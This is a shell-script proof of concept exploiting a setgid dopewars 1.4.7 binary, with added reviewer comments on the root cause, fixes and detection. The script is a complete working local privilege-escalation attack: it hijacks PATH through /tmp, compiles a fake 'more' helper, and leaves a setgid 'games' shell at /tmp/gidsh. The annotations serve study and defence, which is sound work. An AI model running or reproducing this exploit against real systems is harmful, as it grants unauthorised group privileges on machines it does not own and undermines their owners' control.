#!/bin/sh
# dopewars.sh(1.4.7): shell script by Vade79->[email protected]. gives gid=games.
# insecure use of a popen call while setgid isn't good in any situation.
#
# Reviewer notes (defensive reading of this proof of concept):
# - Root cause, per the author's note above: a setgid binary calls popen()
#   without first dropping its group privilege. The PATH change and the
#   helper named "more" below suggest the spawned helper is resolved through
#   the caller-controlled PATH -- presumably a pager; confirm against the
#   dopewars source.
# - Fix in the program: give up the extra gid before spawning anything, run
#   helpers by absolute path with a sanitized environment, or avoid
#   popen()/system() in privileged code altogether.
# - Hardening and detection: mount /tmp with nosuid so set-id bits on files
#   there are ignored, and audit for unexpected setuid/setgid files in
#   world-writable directories.

# Locate the target binary through the current PATH.
DOPEWARS=`which dopewars`
if [ "$DOPEWARS" ];
then echo "[*] dopewars binary found: $DOPEWARS."
# NOTE(review): a bare `exit` returns the status of the preceding echo, so
# both abort paths in this script exit 0.
else echo "[!] dopewars binary was not found, aborted.";exit
fi
# Precondition check: looks for "sr-" (group execute shown as "s", i.e. the
# setgid bit) anywhere in the `ls -l` line for the binary.
CHECK=`ls -l $DOPEWARS | grep sr-`
if [ "$CHECK" ];
then echo "[*] dopewars found to be setgid, proceeding."
else echo "[!] dopewars NOT found to be setgid, aborted.";exit
fi
# Put a world-writable directory first in the search path; every command the
# target resolves by bare name is now looked up in /tmp first.
PATH=/tmp:$PATH
# Stage a copy of the shell; at this point it is an ordinary file owned by
# the caller.
cp /bin/sh /tmp/gidsh
# Build a stand-in named "more" whose only job is to chgrp the staged copy to
# "games" and set mode 2755 on it. That only has the intended effect if it is
# run with the games group privilege still in place.
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c
cc /tmp/more.c -o /tmp/more
# Scripted input for the target: request help, then quit.
cat <<X>/tmp/dopecmds
help
quit
X
# Run the target with -s, reading the two commands from the file above and
# discarding all of its output.
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1
# Remove the staging files; /tmp/gidsh is deliberately left behind.
rm -f /tmp/more* /tmp/dopecmds
# Outcome check: the same "sr-" match, this time on the staged shell copy.
# For defenders, a setgid file in /tmp is the artifact to look for.
CHECK=`ls -l /tmp/gidsh | grep sr-`
if [ "$CHECK" ];
then echo "[*] success, setgid shell is in: /tmp/gidsh."
else echo "[!] failed, the setgid shell doesn't exist."
fi